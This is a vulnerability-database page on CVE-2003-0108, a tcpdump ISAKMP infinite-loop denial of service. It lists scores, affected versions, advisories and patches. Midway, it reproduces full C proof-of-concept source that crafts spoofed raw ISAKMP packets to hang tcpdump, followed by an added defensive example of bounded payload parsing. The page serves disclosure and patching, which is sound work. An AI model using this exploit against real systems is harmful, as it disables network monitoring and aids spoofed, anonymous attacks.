CVE-2003-0108
CVSS5.0
Published: 2003-03-07 00:00:00
Last revised: 2016-10-17 22:29:37

[Original text] isakmp_sub_print in tcpdump 3.6 through 3.7.1 allows remote attackers to cause a denial of service (CPU consumption) via a certain malformed ISAKMP packet to UDP port 500, which causes tcpdump to enter an infinite loop.


[CNNVD] TCPDump Malformed ISAKMP Packet Remote Denial of Service Vulnerability (CNNVD-200303-041)

        TCPDUMP is a widely used network analysis tool; it prints information about packets on a network interface that match a given expression. See http://www.tcpdump.org for details.
        TCPDUMP contains a flaw in its parsing of malformed ISAKMP packets; a remote attacker can exploit it to send TCPDUMP into an infinite loop, causing a denial of service. A remote user can craft a special ISAKMP packet for TCPDUMP to parse, which drives TCPDUMP into an infinite loop so that it no longer monitors network traffic. To trigger the flaw anonymously, the attacker must spoof the source address of the malicious packet.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:lbl:tcpdump:3.7
cpe:/a:lbl:tcpdump:3.6.2
cpe:/a:lbl:tcpdump:3.7.1
cpe:/a:lbl:tcpdump:3.5.2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0108
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0108
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-041
(official data source) CNNVD

- Other links and resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000629
(UNKNOWN)  CONECTIVA  CLA-2003:629
http://marc.info/?l=bugtraq&m=104637420104189&w=2
(UNKNOWN)  BUGTRAQ  20030227 iDEFENSE Security Advisory 02.27.03: TCPDUMP Denial of Service Vulnerability in ISAKMP Packet Parsin
http://marc.info/?l=bugtraq&m=104678787109030&w=2
(UNKNOWN)  BUGTRAQ  20030304 [OpenPKG-SA-2003.014] OpenPKG Security Advisory (tcpdump)
http://www.debian.org/security/2003/dsa-255
(VENDOR_ADVISORY)  DEBIAN  DSA-255
http://www.idefense.com/advisory/02.27.03.txt
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/advisory/02.27.03.txt
http://www.iss.net/security_center/static/11434.php
(VENDOR_ADVISORY)  XF  tcpdump-isakmp-dos(11434)
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:027
(UNKNOWN)  MANDRAKE  MDKSA-2003:027
http://www.novell.com/linux/security/advisories/2003_015_tcpdump.html
(UNKNOWN)  SUSE  SuSE-SA:2003:0015
http://www.redhat.com/support/errata/RHSA-2003-032.html
(UNKNOWN)  REDHAT  RHSA-2003:032
http://www.redhat.com/support/errata/RHSA-2003-085.html
(UNKNOWN)  REDHAT  RHSA-2003:085
http://www.redhat.com/support/errata/RHSA-2003-214.html
(UNKNOWN)  REDHAT  RHSA-2003:214
http://www.securityfocus.com/bid/6974
(VENDOR_ADVISORY)  BID  6974

- Vulnerability information

TCPDump Malformed ISAKMP Packet Remote Denial of Service Vulnerability
Medium  Design error
2003-03-07 00:00:00 2012-11-30 00:00:00
Remote  
        TCPDUMP is a widely used network analysis tool; it prints information about packets on a network interface that match a given expression. See http://www.tcpdump.org for details.
        TCPDUMP contains a flaw in its parsing of malformed ISAKMP packets; a remote attacker can exploit it to send TCPDUMP into an infinite loop, causing a denial of service. A remote user can craft a special ISAKMP packet for TCPDUMP to parse, which drives TCPDUMP into an infinite loop so that it no longer monitors network traffic. To trigger the flaw anonymously, the attacker must spoof the source address of the malicious packet.

- Advisories and patches

        Vendor patches:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-255

        LBL
        ---
        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:
        LBL Upgrade tcpdump-3.7.2.tar.gz
        
        http://www.tcpdump.org/release/tcpdump-3.7.2.tar.gz

        MandrakeSoft
        ------------
        MandrakeSoft has published a security advisory (MDKSA-2003:027) and corresponding patches:
        MDKSA-2003:027:Updated tcpdump packages fix denial of service vulnerabilities
        Link:
        http://www.linux-mandrake.com/en/security/2003/2003-027.php

        Patch downloads:
        Updated Packages:
        Corporate Server 2.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm
        Mandrake Linux 8.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm
        Mandrake Linux 8.1/IA64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/libpcap0-0.7.2-1.1mdk.ia64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.ia64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ia64/8.1/RPMS/tcpdump-3.7.2-1.1mdk.ia64.rpm
        ftp://download.sourceforge.net/pub/m

- Vulnerability information (22294)

TCPDump 3.x Malformed ISAKMP Packet Denial Of Service Vulnerability (EDBID:22294)
linux dos
2003-03-01 Verified
0 The Salvia Twist
N/A
source: http://www.securityfocus.com/bid/6974/info

It has been reported that tcpdump is vulnerable to a denial of service when some packet types are received. By sending a maliciously formatted packet to a system using a vulnerable version of tcpdump, it is possible for a remote user to cause tcpdump to ignore network traffic from the time the packet is received until the application is terminated and restarted.

/*
 * ST-tcphump.c -- tcpdump ISAKMP denial of service attack
 * 	The Salvia Twist
 * 	01/03/03
 * 
 * "A vulnerability exists in the parsing of ISAKMP packets (UDP port 500)
 *  that allows an attacker to force TCPDUMP into an infinite loop upon
 *  receipt of a specially crafted packet."
 *
 * The fault really lies in isakmp_sub0_print() not isakmp_sub_print().
 * 
 * Sometimes spoofed packets don't reach their destination, so we have support 
 * for non-spoofed packets.
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>	/* bzero() */
#include <time.h>	/* time() used to seed rand() */
#include <linux/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>	/* inet_addr() */
#include <sys/socket.h>
#include <unistd.h>

#define ISAKMPGEN_SIZE	sizeof(struct isakmpgen)
#define ISAKMPHEAD_SIZE sizeof(struct isakmphdr)
#define PSDHEAD_SIZE	sizeof(struct pseudohdr)
#define UDPHEAD_SIZE	sizeof(struct udphdr)
#define IPHEAD_SIZE	sizeof(struct iphdr)
#define PORT		500

struct isakmpgen * isakmpg(void);
struct isakmphdr * isakmph(void);
struct udphdr * udph(void);
struct iphdr * iph(void);
__u16 cksum(__u16 *buf, int nbytes);
void get_interface(void);
void usage(void);

struct isakmpgen {
	__u8 np;
	__u8 reserved;
	__u16 length;
};

struct isakmphdr {
	__u8 i_ck[8];
	__u8 r_ck[8];
	__u8 np;
	__u8 vers;
	__u8 etype;
	__u8 flags;
	__u8 msgid[4];
	__u32 len;
};

struct pseudohdr {
	__u32 saddr;
	__u32 daddr;
	__u8 zero;
	__u8 protocol;
	__u16 length;
};

struct sockaddr_in saddr;
struct sockaddr_in local;
int spoof;

int main(int argc, char *argv[]) {
	char *packet = malloc(4096);
	char *pseudo = malloc(4096);
	struct isakmpgen *isakmpgen = malloc(ISAKMPGEN_SIZE);
	struct isakmphdr *isakmp = malloc(ISAKMPHEAD_SIZE);
	struct pseudohdr *phdr = malloc(PSDHEAD_SIZE);
	struct udphdr	*udp = malloc(UDPHEAD_SIZE);
	struct iphdr	*ip = malloc(IPHEAD_SIZE);
	int sock = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
	int one = 1;
	const int *val = &one;
	
	printf("ST-tcphump tcpdump ISAKMP denial of service\n");
	printf("	The Salvia Twist\n");
	
	if(argc < 2) {
		usage();
		exit(1);
	}
	
	if(!strcmp(argv[1], "-s"))
		spoof = 0;
	else {
		spoof = 1;
		get_interface();
	}
			
	if(!spoof && argc < 3) {
		usage();
		exit(1);
	}
	
	/* sizeof(packet) would be the pointer size, not the 4096-byte buffer */
	bzero(packet, 4096);
	bzero(pseudo, 4096);
	srand(time(NULL));
	
	saddr.sin_family = AF_INET;
	saddr.sin_port = htons(PORT);
	
	if(spoof)
		saddr.sin_addr.s_addr = inet_addr(argv[1]);
	else
		saddr.sin_addr.s_addr = inet_addr(argv[2]);
	
	setsockopt(sock, IPPROTO_IP, IP_HDRINCL, val, sizeof(one));
	
	ip = iph();
	udp = udph();
	isakmp = isakmph();
	isakmpgen = isakmpg();
	
	memcpy(&phdr->saddr, &ip->saddr, 4);
	memcpy(&phdr->daddr, &ip->daddr, 4);
	phdr->protocol = 17;
	phdr->length = htons(UDPHEAD_SIZE + ISAKMPHEAD_SIZE + ISAKMPGEN_SIZE);
	
	memcpy(pseudo, phdr, PSDHEAD_SIZE);
	memcpy(pseudo + PSDHEAD_SIZE, udp, UDPHEAD_SIZE);
	memcpy(pseudo + PSDHEAD_SIZE + UDPHEAD_SIZE, isakmp, ISAKMPHEAD_SIZE);
	memcpy(pseudo + PSDHEAD_SIZE + UDPHEAD_SIZE + ISAKMPHEAD_SIZE,
			isakmpgen, ISAKMPGEN_SIZE);
	
	udp->check = cksum((u_short*) pseudo, PSDHEAD_SIZE + UDPHEAD_SIZE +
			ISAKMPHEAD_SIZE + ISAKMPGEN_SIZE);
	
	memcpy(packet, ip, IPHEAD_SIZE);
	memcpy(packet + IPHEAD_SIZE, udp, UDPHEAD_SIZE);
	memcpy(packet + IPHEAD_SIZE + UDPHEAD_SIZE, isakmp, ISAKMPHEAD_SIZE);
	memcpy(packet + IPHEAD_SIZE + UDPHEAD_SIZE + ISAKMPHEAD_SIZE,
			isakmpgen, ISAKMPGEN_SIZE);
		
	ip->check = cksum((u_short*) packet, ip->tot_len >> 1);
	memcpy(packet, ip, IPHEAD_SIZE);

	if(sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *) &saddr,
				sizeof(saddr)) < 0) {
		printf("sendto error\n");
		exit(1);
	}
	
	printf("Packet sent.\n");
	
	return 0;
}

void usage(void) {
	printf("\nUsage: ST-tcphump -s <target addr>\n");
	printf("\t-s\tdon't spoof source address\n");
}

__u16 cksum(__u16 *buf, int nbytes) {
	__u32 sum;
	__u16 oddbyte;

	sum = 0;
	while(nbytes > 1) {
		sum += *buf++;
		nbytes -= 2;
	}

	if(nbytes == 1) {
		oddbyte = 0;
		*((__u16 *) &oddbyte) = *(__u8 *) buf;
		sum += oddbyte;
	}

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);

	return (__u16) ~sum;
}

struct isakmpgen * isakmpg(void) {
	struct isakmpgen *isakmpg = malloc(ISAKMPGEN_SIZE);

	bzero(isakmpg, ISAKMPGEN_SIZE);
	isakmpg->np = 69;
	/* length left at 0 */
	return isakmpg;
}

struct isakmphdr * isakmph(void) {
	struct isakmphdr *isakmph = malloc(ISAKMPHEAD_SIZE);
	int i;
	
	bzero(isakmph, ISAKMPHEAD_SIZE);
	for(i = 0; i < 8; i++) {
		isakmph->i_ck[i] = rand() % 256;
		isakmph->r_ck[i] = rand() % 256;
	}
	for(i = 0; i < 4; i++)
		isakmph->msgid[i] = rand() % 256;
	isakmph->vers = 0x8 << 4 | 0x9;
	isakmph->np = 69;
	isakmph->etype = 2;
	isakmph->len = htonl(ISAKMPHEAD_SIZE + ISAKMPGEN_SIZE);
	return isakmph;
}

struct udphdr * udph(void) {
	struct udphdr *udph = malloc(UDPHEAD_SIZE);

	udph->source = htons(PORT);//htons(1024 + (rand() % 2003));
	udph->dest = htons(PORT);
	udph->len = UDPHEAD_SIZE + ISAKMPHEAD_SIZE + ISAKMPGEN_SIZE;
	udph->check = 0;
	return udph;
}

struct iphdr * iph(void) {
	struct iphdr *iph = malloc(IPHEAD_SIZE);

	iph->ihl = 5;
	iph->version = 4;
	iph->tos = 0;
	iph->tot_len = IPHEAD_SIZE + UDPHEAD_SIZE + ISAKMPHEAD_SIZE + 
		ISAKMPGEN_SIZE;
	iph->id = htons(rand());
	iph->frag_off = 0;
	iph->ttl = 225;
	iph->protocol = 17;
	iph->check = 0;

	if(spoof) {
		iph->saddr = saddr.sin_addr.s_addr;
	}
	else
		iph->saddr = local.sin_addr.s_addr;
	
	iph->daddr = saddr.sin_addr.s_addr;
	
	return iph;
}

/* thanks hping2 */
void get_interface(void) {
	int sockr, on = 1;
	socklen_t len;	/* getsockname() takes a socklen_t * */
	struct sockaddr_in dest;
	struct sockaddr_in iface;

	memset(&iface, 0, sizeof(iface));
	memcpy(&dest, &saddr, sizeof(struct sockaddr_in));
	dest.sin_port = htons(11111);

	sockr = socket(AF_INET, SOCK_DGRAM, 0);

	if(setsockopt(sockr, SOL_SOCKET, SO_BROADCAST, &on, sizeof(on)) == -1) {
		printf("getsockopt error\n");
		exit(1);
	}

	if(connect(sockr, (struct sockaddr *)&dest,
				sizeof(struct sockaddr_in)) == -1) {
		printf("connect error\n");
		exit(1);
	}

	len = sizeof(iface);
	if(getsockname(sockr, (struct sockaddr *)&iface, &len) == -1) {
		printf("getsockname error\n");
		exit(1);
	}
	
	close(sockr);
	memcpy(&local, &iface, sizeof(struct sockaddr_in));
	return;
}
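
As an added illustration (not part of the original page, and not tcpdump's code), the following C program contrasts a naive ISAKMP payload-chain walk, which advances by each payload's own length field, with a bounded one that rejects any payload shorter than its 4-byte generic header or extending past the message length given in the ISAKMP header. The two sample packets are constructed inline: one mirrors the layout the PoC above builds (header next-payload 69, then a generic payload header with length 0), the other is a well-formed single-payload message. All function and constant names, the 64-payload cap and the sample byte values are the example's own.

```c
/* Added example (not tcpdump's code): a bounded ISAKMP payload-chain walk
 * next to a naive one, run over two packets constructed inline. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ISAKMP_HDR_LEN 28  /* cookies(16) np(1) vers(1) etype(1) flags(1) msgid(4) length(4) */
#define ISAKMP_GEN_LEN  4  /* generic payload header: np(1) reserved(1) length(2) */
#define MAX_PAYLOADS   64  /* defensive cap on chain length (example's choice) */

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Naive walk: trusts each payload's length field and advances by it.
 * Returns the number of iterations run before reaching 'cap'. A payload
 * whose length is 0 never moves the offset, so the walk spins to the cap. */
int naive_walk_spins(const uint8_t *pkt, size_t len, int cap) {
    size_t off = ISAKMP_HDR_LEN;
    uint8_t np = pkt[16];
    int iters = 0;
    while (np != 0 && iters < cap) {
        if (off + ISAKMP_GEN_LEN > len) break;
        np = pkt[off];
        off += be16(pkt + off + 2);   /* length 0 => no forward progress */
        iters++;
    }
    return iters;
}

/* Bounded walk: every payload must be at least ISAKMP_GEN_LEN bytes and
 * must fit inside the message length from the header. Returns the payload
 * count, or -1 for a malformed chain. */
int isakmp_walk_payloads(const uint8_t *pkt, size_t len) {
    if (len < ISAKMP_HDR_LEN) return -1;
    uint32_t total = be32(pkt + 24);
    if (total < ISAKMP_HDR_LEN || total > len) return -1;
    uint8_t np = pkt[16];
    size_t off = ISAKMP_HDR_LEN;
    int count = 0;
    while (np != 0) {
        if (++count > MAX_PAYLOADS) return -1;        /* chain too long */
        if (off + ISAKMP_GEN_LEN > total) return -1;  /* truncated payload header */
        uint16_t plen = be16(pkt + off + 2);
        if (plen < ISAKMP_GEN_LEN) return -1;         /* zero/short length: would never advance */
        if (plen > total - off) return -1;            /* payload overruns the message */
        np = pkt[off];
        off += plen;
    }
    return count;
}

/* Constructed packet mirroring the PoC layout: header np=69, length 32,
 * followed by a generic payload header with np=69 and length 0. */
size_t build_malformed_sample(uint8_t *buf) {
    memset(buf, 0, 32);
    memset(buf, 0xAA, 16);   /* cookies: arbitrary constructed bytes */
    buf[16] = 69;            /* next payload: unknown type, as in the PoC */
    buf[17] = 0x10;          /* version 1.0 */
    buf[18] = 2;             /* exchange type */
    buf[27] = 32;            /* big-endian length = 32 */
    buf[28] = 69;            /* payload: next = 69, reserved 0, length 0 */
    return 32;
}

/* Constructed well-formed packet: one 8-byte payload, chain terminated. */
size_t build_wellformed_sample(uint8_t *buf) {
    memset(buf, 0, 36);
    memset(buf, 0xAA, 16);
    buf[16] = 1;             /* first payload: SA */
    buf[17] = 0x10;
    buf[18] = 2;
    buf[27] = 36;            /* length = 36 */
    buf[28] = 0;             /* payload: next = none */
    buf[31] = 8;             /* payload length = 8 */
    return 36;
}

int walk_malformed_sample(void) { uint8_t b[64]; size_t n = build_malformed_sample(b); return isakmp_walk_payloads(b, n); }
int walk_wellformed_sample(void) { uint8_t b[64]; size_t n = build_wellformed_sample(b); return isakmp_walk_payloads(b, n); }
int naive_spins_malformed_sample(int cap) { uint8_t b[64]; size_t n = build_malformed_sample(b); return naive_walk_spins(b, n, cap); }
int naive_spins_wellformed_sample(int cap) { uint8_t b[64]; size_t n = build_wellformed_sample(b); return naive_walk_spins(b, n, cap); }

int main(void) {
    printf("bounded walk: malformed=%d wellformed=%d\n", walk_malformed_sample(), walk_wellformed_sample());
    printf("naive walk:   malformed spins=%d wellformed spins=%d\n",
           naive_spins_malformed_sample(1000), naive_spins_wellformed_sample(1000));
    return 0;
}
```

Compile with any C99 compiler and run: on the constructed malformed packet the naive walk reaches the iteration cap without ever advancing, which is the no-progress condition behind the reported hang, while the bounded walk returns -1 for it and 1 for the well-formed packet. The three checks in the bounded walk (minimum payload length, payload fits in the message, cap on chain length) are what make the loop terminate on any input.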


		

- Vulnerability information

8811
tcpdump ISAKMP isakmp_sub_print DoS
Denial of Service
Loss of Availability

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-02-27 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

TCPDump Malformed ISAKMP Packet Denial Of Service Vulnerability
Design Error 6974
Yes No
2003-02-27 12:00:00 2009-07-11 08:06:00
Discovery of this vulnerability is credited to Andrew Griffiths <andrewg@d2.net.au>

- Affected program versions

S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0
LBL tcpdump 3.7.1
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ S.u.S.E. Linux 8.1
LBL tcpdump 3.7
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
+ FreeBSD FreeBSD 4.5 -STABLE
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4 -STABLE
+ FreeBSD FreeBSD 4.4 -RELENG
+ FreeBSD FreeBSD 4.4
+ FreeBSD FreeBSD 4.3 -STABLE
+ FreeBSD FreeBSD 4.3 -RELENG
+ FreeBSD FreeBSD 4.3 -RELEASE
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2 -STABLE
+ FreeBSD FreeBSD 4.2 -RELEASE
+ FreeBSD FreeBSD 4.2
LBL tcpdump 3.6.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ HP Secure OS software for Linux 1.0
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
LBL tcpdump 3.5.2
LBL tcpdump 3.7.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.1
+ Turbolinux Turbolinux Workstation 6.0
LBL tcpdump 3.4 a6
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ S.u.S.E. Firewall Adminhost VPN
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux Admin-CD for Firewall
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Enterprise Server for S/390
+ S.u.S.E. Linux Live-CD for Firewall
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 7

- Unaffected program versions

LBL tcpdump 3.7.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.1
+ Turbolinux Turbolinux Workstation 6.0
LBL tcpdump 3.4 a6
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ S.u.S.E. Firewall Adminhost VPN
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux Admin-CD for Firewall
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Enterprise Server for S/390
+ S.u.S.E. Linux Live-CD for Firewall
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 7

- Vulnerability discussion

It has been reported that tcpdump is vulnerable to a denial of service when some packet types are received. By sending a maliciously formatted packet to a system using a vulnerable version of tcpdump, it is possible for a remote user to cause tcpdump to ignore network traffic from the time the packet is received until the application is terminated and restarted.

- Exploit

The following proof of concept exploit was supplied:

- Solution

SuSE has released an advisory (SuSE-SA:2004:002), which contains fixes to address this issue. Further information about obtaining and applying fixes can be found in the advisory.

Conectiva has released an advisory (CLA-2003:629). Information about obtaining and applying fixes is available in the referenced advisory.

OpenPKG has released an advisory (OpenPKG-SA-2003.014). Information about obtaining and applying fixes is available in the referenced advisory.

MandrakeSoft has released an advisory. Information about obtaining and applying fixes is available in the referenced advisory.

Gentoo Linux has released an advisory. Users who have installed net-analyzer/tcpdump are advised to upgrade to tcpdump-3.7.2 by issuing the following commands:

emerge sync
emerge -u tcpdump
emerge clean

SuSE has released an advisory (SuSE-SA:2003:0015) which contains fixes. Further information about obtaining and applying fixes can be found in the advisory.

Red Hat has released a security advisory (RHSA-2003:032-01) that contains fixes addressing this and other tcpdump issues. Users are advised to upgrade as soon as possible.

OpenPKG has released an advisory OpenPKG-SA-2004.002 to address this and other issues. Please see the referenced advisory for more information.

The following fixes are available:


LBL tcpdump 3.5.2

LBL tcpdump 3.6.2

LBL tcpdump 3.7

LBL tcpdump 3.7.1

S.u.S.E. Linux 8.0

S.u.S.E. Linux 8.1

S.u.S.E. Linux Personal 8.2

S.u.S.E. Linux Personal 9.0

S.u.S.E. Linux Personal 9.0 x86_64

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's related websites.